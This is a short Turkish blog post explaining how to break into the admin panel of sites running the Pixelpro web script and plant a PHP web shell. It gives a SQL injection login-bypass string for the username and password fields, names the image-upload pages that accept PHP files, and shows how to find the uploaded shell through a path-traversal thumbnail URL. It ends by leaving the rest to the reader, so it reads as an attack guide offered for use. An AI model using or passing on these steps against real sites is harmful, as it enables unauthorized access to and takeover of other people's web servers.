Selamün aleyküm,
Bu konuda pixelpro adlı scriptin admin paneline giriş ve shell upload anlatmaya çalışacağım..
Üretici firma : http://www.pixelprodesigns.com/
Başlayalım,
1-) Pixelpro kurulu hedef sitemiz xxx.com olsun.
2-) xxx.com/admin giriyoruz.
3-) Kullanıcı Adı : ’ or 1=1 limit 1 -- -+
4-) Şifre : ’ or 1=1 limit 1 -- -+
5-) Giriş yaptıktan sonra şu yolu izliyoruz :
# 1- Manage Property Image
# 2- Manage Gallery
# 3- Manage Logo
6-) ve Shell’imizi upload ediyoruz. [PHP Kabul Ediyor.]
Shell bilgileri : Shell yolumuzu öğrenmek için yüklediğimiz shell’e sağ tıklayıp resim urlsini kopyala diyoruz.
# Örnek : xxx.com/admin/makeThumbnail.php?file=../images/propertyimage/20140803035408-Shell.php&w=100&h=80
Sonra boyut bilgilerini siliyoruz ve URL şu hali alıyor.
xxx.com/images/propertyimage/20140803035408-Shell.php
Bu kadar,
Gerisi size kalmış.
0 yorum:
Yorum Gönder